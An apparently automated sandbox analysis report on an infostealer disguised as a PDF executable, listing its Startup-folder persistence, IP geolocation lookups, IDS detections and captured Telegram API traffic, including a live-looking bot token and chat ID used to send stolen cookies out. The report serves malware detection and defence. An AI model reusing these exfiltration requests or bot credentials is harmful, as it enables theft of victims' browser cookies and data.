Machine Learning detection for sample

Source: PDF-3093900299039 pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PDF-3093900299039 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

Source: PDF-3093900299039 pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmp, audiomaximizer.exe, 00000005.00000002.4134302304.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 01D2F45Dh	3_2_01D2F2C0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 01D2F45Dh	3_2_01D2F4AC
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6B3C8h	3_2_05B6AFB0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B60D0Dh	3_2_05B60B30
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B61697h	3_2_05B60B30
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6AE01h	3_2_05B6AB50
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6E87Bh	3_2_05B6E5D0
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_05B60673
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6E421h	3_2_05B6E178
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_05B60040
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6F261h	3_2_05B6EFB8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_05B60853
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6EE09h	3_2_05B6EB60
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6F6B9h	3_2_05B6F410
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6D719h	3_2_05B6D470
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6B3C8h	3_2_05B6B2F6
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6DFC9h	3_2_05B6DD20
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6DB71h	3_2_05B6D8C8
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 4x nop then jmp 05B6FB11h	3_2_05B6F868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 0168F45Dh	8_2_0168F2C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 0168F45Dh	8_2_0168F52F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 0168F45Dh	8_2_0168F4AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 0168FC19h	8_2_0168F960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0B3C8h	8_2_05D0AFB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0AE01h	8_2_05D0AB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0E87Bh	8_2_05D0E5D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_05D00673
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0E421h	8_2_05D0E178
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_05D00040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0F261h	8_2_05D0EFB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0B3C8h	8_2_05D0AFA2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_05D00853
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0EE09h	8_2_05D0EB60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D00D0Dh	8_2_05D00B30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D01697h	8_2_05D00B30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0D719h	8_2_05D0D470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0F6B9h	8_2_05D0F410
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0B3C8h	8_2_05D0B2F6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0DFC9h	8_2_05D0DD20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0DB71h	8_2_05D0D8C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 05D0FB11h	8_2_05D0F868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06EDA100h	8_2_06ED9E08
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED2978h	8_2_06ED2680
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED1190h	8_2_06ED0E98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED4160h	8_2_06ED3E68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED5948h	8_2_06ED5650
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED8919h	8_2_06ED8620
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED7130h	8_2_06ED6E38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED62D8h	8_2_06ED5FE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED4AF0h	8_2_06ED47F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED7AC0h	8_2_06ED77C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED92A8h	8_2_06ED8FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED1FE8h	8_2_06ED1CF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED4FB8h	8_2_06ED4CC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED37D0h	8_2_06ED34D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED67A0h	8_2_06ED64A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED7F88h	8_2_06ED7C90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED9770h	8_2_06ED9478
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED0800h	8_2_06ED0508
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED8DE0h	8_2_06ED8AE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED1658h	8_2_06ED1360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED2E40h	8_2_06ED2B48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED4628h	8_2_06ED4330
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED75F8h	8_2_06ED7300
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED5E10h	8_2_06ED5B18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED0338h	8_2_06ED0040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED1B20h	8_2_06ED1828
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED3308h	8_2_06ED3010
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED0CC8h	8_2_06ED09D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED3C98h	8_2_06ED39A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED24B0h	8_2_06ED21B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED5480h	8_2_06ED5188
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED6C68h	8_2_06ED6970
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED9C38h	8_2_06ED9940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 4x nop then jmp 06ED8450h	8_2_06ED8158

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49760 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49778 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49773 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49777 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecdHost: api.telegram.orgContent-Length: 7046
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34928e143909Host: api.telegram.orgContent-Length: 7046

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
